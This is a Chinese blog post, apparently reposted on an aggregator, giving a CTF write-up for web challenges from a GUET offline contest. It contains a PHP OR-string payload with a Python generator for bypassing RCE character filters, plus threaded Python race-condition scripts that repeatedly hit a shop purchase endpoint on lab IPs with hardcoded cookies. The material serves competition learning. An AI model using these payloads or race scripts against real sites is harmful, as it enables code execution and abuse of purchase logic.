当前位置:首页 » 《随便一记》 » 正文

[CTF]GUET梦极光杯线下赛web部分WP_Sapphire037的博客

19 人参与  2022年05月18日 15:41  分类 : 《随便一记》  评论

点击全文阅读


Cover with trick

请添加图片描述
双写绕过,变量覆盖

Construct Master

"%07%15%05%14%03%14%06"|"%60%60%60%60%60%60%60"

import urllib
from sys import *
import os


def action(arg):
	s1 = ""
	s2 = ""
	for i in arg:
		f = open("rce.txt", "r")
		while True:
			t = f.readline()
			if t == "":
				break
			if t[0] == i:
				# print(i)
				s1 += t[2:5]
				s2 += t[6:9]
				break
		f.close()
	output = "(\"" + s1 + "\"|\"" + s2 + "\")"
	return (output)
while True:
	param = action(input("\n[+] your function:"))
	print(param)

rce.txt如何生成详情见我的文章

WEB Engineer

curl或者直接bp发包访问index.php

race on shop


条件竞争,一直购买,然后带着购买完的cookie去访问flag.php即可

import requests
import threading
url = "http://172.16.68.4:28013/?id=2"
url2 = "http://172.16.68.4:28013/flag.php"
cookie1 = {"PHPSESSID": "99c6b70d71e29eb6c11e9321c363393e", 'gold_card_id': 'afd3475b15b945e2efd00f66583c61c4'}

def bp(session):
    r = session.get(url, cookies=cookie1)
    if "成功" in r.text:
        print(r.text)
if __name__ == '__main__':
    session = requests.session()
    for i in range(0,50):
        threading.Thread(target=bp, args=(session,)).start()

或者

import requests
import threading

def get():
	url = "http://172.16.68.4:28045/?id=2"
	cookie1 = {'gold_card_id': 'afd3475b15b945e2efd00f66583c61c4'}
	r=requests.get(url,cookies=cookie1)
# def get1():
# 	try:
# 		while True:
# 			r=requests.get(url,cookies=cookie1)
# 			if "成功" in r.text:
# 				print(r.text)
# 	except:
# 		pass
# def get2():
# 	try:
# 		while True:
# 			r=requests.get(url,cookies=cookie1)
# 			if "成功" in r.text:
# 				print(r.text)
# 	except:
# 		pass
# def get3():
# 	try:
# 		while True:
# 			r=requests.get(url,cookies=cookie1)
# 			if "成功" in r.text:
# 				print(r.text)
# 	except:
# 		pass
# def get4():
# 	try:
# 		while True:
# 			r=requests.get(url,cookies=cookie1)
# 			if "成功" in r.text:
# 				print(r.text)
# 	except:
# 		pass
# if __name__ == '__main__':
# 	event=threading.Event()
# 	event.set()
# 	while True:
# 		for i in range(1,50):
# 			t=threading.Thread(target=get)
# 			t.start()
# 			t2=threading.Thread(target=get1)
# 			t.start()
# 			t3 = threading.Thread(target=get2)
# 			t.start()
# 			t4 = threading.Thread(target=get3)
# 			t.start()
# 			t5 = threading.Thread(target=get4)
# 			t.start()
if __name__ == '__main__':
	import gevent
	from gevent.pool import Pool
	from gevent import monkey
	monkey.patch_all()
	pool=Pool(100)
	for i in range(50):
		pool.spawn(get)

	gevent.wait()

请添加图片描述


点击全文阅读


本文链接:http://m.zhangshiyu.com/post/40394.html

成功  购买  带着  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新文章

  • [糙汉嘴软心硬,娇妻日日晚起]小说精彩节选免费试读_「黎夏顾卫城」主线最终章倒计时
  • 我的亲妹妹我当做畜生,只有儿子来救我反转剧情试读片段_[***小宝李小翠]精彩章节免费试读
  • 往梦难复温,沈淮霆宋思予在线_往梦难复温,沈淮霆宋思予在线
  • 爱意清浅随风离(简凝夕陆靳燃),爱意清浅随风离
  • 「冲喜而已,侯爷别太爱」小说免费在线阅读_侯府侯爷乐瑶主线最终章倒计时
  • 好看的往梦难复温沈淮霆宋思予_往梦难复温沈淮霆宋思予
  • 天才京剧花旦被废嗓后成为芭蕾舞王+后续+结局(秦意宋笙)全书秦意宋笙结局_秦意宋笙+结局列表_笔趣阁(天才京剧花旦被废嗓后成为芭蕾舞王+后续+结局)
  • (番外)+(全书)往梦难复温(沈淮霆宋思予+番外+全书)_(往梦难复温+番外+全书)免费_笔趣阁(沈淮霆宋思予)
  • 江晚烟陆聿我终于失去了你结局+番外(江晚烟陆聿)列表_江晚烟陆聿我终于失去了你结局+番外(江晚烟陆聿)结局篇+番外在线
  • 池雾陆砚寒结局+番外(陆砚寒池雾)列表_池雾陆砚寒结局+番外(陆砚寒池雾)池雾陆砚寒结局+番外在线
  • 沈静怡傅励行+后续+结局(傅励行沈静怡)列表_沈静怡傅励行+后续+结局(傅励行沈静怡)沈静怡傅励行+后续+结局在线
  • 非典时,我被妻子的白月光误诊遗弃在病房节选角色羁绊特辑‌_田越苏雅白月光角色专属支线试读入口

    关于我们 | 我要投稿 | 免责申明

    Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1